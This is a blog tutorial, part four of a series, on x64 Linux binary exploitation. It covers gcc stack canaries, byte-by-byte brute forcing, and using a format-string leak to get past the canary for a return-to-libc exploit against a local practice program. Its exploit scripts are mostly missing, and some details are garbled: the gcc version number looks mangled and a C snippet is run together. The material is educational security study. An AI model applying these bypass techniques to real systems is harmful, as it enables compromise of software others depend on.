Introduction to x64 Linux Binary Exploitation (Part 4)- Stack Canaries
This post is the fourth one of a series of articles in which we are exploring some basic x64 Linux Binary Exploitation techniques. We started with a simple buffer overflow in which all memory protection mechanisms were disabled and gradually we enabled them - one by one - in order to explore how they can be circumvented. More specifically:
- In Part 1, we developed a linux executable which was vulnerable to a Buffer Overflow and we exploited it after disabling all the memory protection mechanisms.
- In Part 2, we enabled NX and we demonstrated how this protection can be circumvented using a return into library technique.
- In Part 3, we enabled NX once again and we demonstrated an additional bypass technique which uses a return into libc technique in conjunction with the mprotect system call.
In this part we are going to discuss about stack canaries (or security cookies if you prefer) and see under which conditions this protection mechanism can be bypassed.
As always, before we start, you can use the links bellow to navigate to the rest of the other parts:
About: Stack Canaries
The expression Stack Canaries is a paraphrase of the Canary in a coal mine which refers to a protection mechanism used by the coal miners in the early 20th century up to 1980s. It is a stack-based buffer overflow mitigation mechanism which leverages the fact that such an attack needs to overwrite all the memory space from the overflowed buffer up to the return address which is also pushed in the stack. Assume that at the beginning of a function call (e.g. during its prologue) we are saving a value in the function’s stack frame, we would expect (! if everything went well !) to read the same value just before the function exits or namely at its epilogue. If the value has changed, then the execution of the program will be terminated and an error message will be displayed.
A visual representation of the concept is depicted in the figure bellow: Since the return address has to be overwritten in order to gain control of the code flow, the adversaries have somehow to deal with the canary or else it will start chirping *** stack smashing detected ***:
Reasonably, someone would claim, why not just simply embed the canary value in the right part of the payload, in order to pass the epilogue check ?
Well…There are three main types of canaries:
Terminator: consisting of at least one string terminating character (new line, null e.t.c.) and the idea is that since most overflow vulnerabilities occur from functions such as gets(), strcpy(), the attacker won’t be able to include them in the payload.
Consider for example a gets() based overflow, as this function stops when the newline character is read, then the attacker won’t be able to “replicate” such a character in the payload thus the epilogue check will fail. However the same protection strategy would fail for “raw” memory operations like memcpy, memset e.t.c.
Random : consisting of a random byte sequence that is not known to the attacker.
The value is stored in a table or a constant and is compared with the value in the stack at the function’s epilogue. This approach though would fail if the attacker managed to chain the BoF with some memory leak vulnerability.
Random XOR: consisting of a random value (as above) XOR’ed with a mask constructed from the adjacent frame pointer and return address.
Similarly to the Random Canary, a memory leak may reveal both the the XORed ones and the saved address, therefore to compute the final value.
Obviously, this protection mechanism is added by the compiler during the compilation process. For the GNU Compiler Collection (gcc), it is implemented via the StackGuard extension which was added to gcc 18.104.22.168. The gcc function prologue and function epilogue functions have been altered to emit code to place and check canary words. The changes are architecture-specific (in our case, i386), but since the total changes are under 100 lines of gcc, portability is not a major concern. All the changes in the gcc calling conventions are undertaken by the callee, so code compiled with the StackGuard-enhanced gcc is completely inter-operable with generic gcc .o files and libraries . In the most recent gcc implementation the StackGuard enhancement ads a global variable using a random value or a terminator canary in case the former fails(line 104):
As it is depicted bellow, when the comparison fails, the familiar *** stack smashing detected *** is displayed:
As this protection is applied by default in gcc, we just have to omit the -fno-stack-protector flag during the compilation process to end up with the following protection mechanisms:
Circumventing Canary Protection Mechanisms
Let’s first look how this type of protection looks in a lower level. We are going to compile our vulnerable program with the stack protection enabled and load it on gdb. For the sake of completeness, the program is the following:
Compile with $gcc vuln.c -o vuln -D_FORTIFY_SOURCE=0 and let’s disassembly the greet_me function:
Notice first the move of the fs:0x28 content to the rax register which subsequently gets stored to the rbp-0x8 address location (1). Few lines bellow the value at rbp-0x8 will be moved to the rax register and will be compared with the value at fs:0x28 (2). If the values much a jump is performed to the leave instruction followed by a ret one.
Definition: The leave instruction reverses the actions of an enter instruction. leave copies the frame pointer to the stack point and releases the stack space formerly used by a procedure for its local variables. leave pops the old frame pointer into (E)BP, thus restoring the caller’s frame. A subsequent ret nn instruction removes any arguments pushed onto the stack of the exiting procedure .
The “mysterious” fs:0x28 value belongs to the FS segment base and its value is set by a call to to the
arch_prctlsystem call during the process initialisation:
This function is triggered by the /lib64/ld-linux-x86–64.so.2. More specifically, the loader will initialise the Thread-local storage (TLS) and set the FS segment register to point to the TLS beginning:
Subsequently, the security_init will set the stack cookie value pointed by the fs:0x28:
As you should have already guess by now, if the adversary knows the cookie value then it would be easy to modify the content where the rbp-0x8 points to in order to mach it. Additionally, as it is set only once, if the cookie is leaked in some point of the program’s execution then it can be used to bypass the guard in every function call. With this information on hand, lets voluntarily print the canary value in the vulnerable program:
As we saw before, gcc doesn’t use a XOR canary, thus the cookie value should be the same for every function call. Indeed, if you run it a couple of times you may notice that the value is the same for both greet_me and greet_me_again function calls:
One last thing to notice is that the canary is always ending with a 0x00 value which serves as a terminator for the purposes we discussed in the previous paragraphs.
There are two main ways in which this protection mechanism may fail, the first is to bruteforce the cookie value, while the second is to chain the BoF with a memory leak vulnerability (e.g. format string). We are going to discuss both in the following paragraphs.
Bruteforcing the *__stack_chk_guard
This type of attack might be successful in 32bit systems where the 24bit entropy of the cookie (considering the NULL byte at the end) can be bypassed in reasonable time. In x64 architecture systems, this approach seems to be less feasible as the entropy increases to 56 bit, ending up in 2⁵⁶ tries in a worst case scenario. Imagine though a server that forks a subprocess to handle each new client and sends the client’s input to this child process. As the child process will have the same canary word on every spawn, an adversary may send one byte at a time and observe the child’s behaviour. Similarly to a padding oracle, if the child process crashes then continue guessing the same position, otherwise move to the next:
- |x1|x2|x3|x4|x5|x6|x7|x8| → initial state
overwrite x1, set i = 0x00
- |i|x2|x3|x4|x5|x6|x7|x8| → if crash then send(i++) else guess(x2)
- 00|45|98| i |x5|x6|x7|x8| → if crash then send(i++) else guess(x2)
- |00|45|98|AC|DE|A9|BA|01| → success
This Byte-for-byte (bfb) brute force attack may decrease the number of tries to 256 x 7. For this reason, most canary implementations set to zero one of the canary bytes for preventing the bfb attacks when the overflow is performed by a string copy functions . We won’t go further to this type of attack, but for those who are interested here is an interesting write up about HTB’s Rope, which demonstrates this attack.
A memory leak chained with a buffer overflow will render this protection mechanism totally futile. The format string attack is a perfect example of this vulnerability and we are going to use in order to demonstrate the bypass. This time our vulnerable program should look like bellow:
#include <stdio.h>#define unsigned_long_int unsigned long intvoid greet_me(char *input)
printf("Hi there %s !!\n",name);
}int main(int argc, char *argv)
We won’t go in to details about the format string attack as it is out of scope for this post, but notice the printf in the greet_me function, which literally prints “raw” the string which is given as a first argument to the program.
$gcc vuln.c -o vuln -D_FORTIFY_SOURCE=0and enter the following string as a first argument:
Notice the highlighted output in position 33 which ends with the 0x00 number:
Now, isolate this number by running
./vuln %33\$llx and repeat running the program a few times. By observing the output you may notice that this 0x00 byte at the end remains unchanged. This value seems to be similar with the cookie format that we discussed in the previous paragraphs, let’s use it in order to craft the new exploitation script.
We are going to use the Return2Libc attack, discussed in Part 2, making of course some adjustments to the final payload. Additionally, we are going to use the pwntools framework as a facilitator in order to accelerate the exploit development process. As it is depicted bellow, the Junk size should shrink to 200 bytes in order to encapsulate the canary value, the next 8 bytes will overwrite the RBP register and the rest of the payload should be the same as before:
Crafting the exploitation script accordingly, at this point it should look as bellow:
As you will probably notice, the only difference with the script from Part 2, is the addendum of the canary value as well as the fact that we are interacting with vulnerable program. The lines 32–33 are just going to write the payload to a file mainly for debugging reasons, thus they can be omitted.
And with that, we are concluding this part, leaving the ASLR protection for the last part of these tutorials.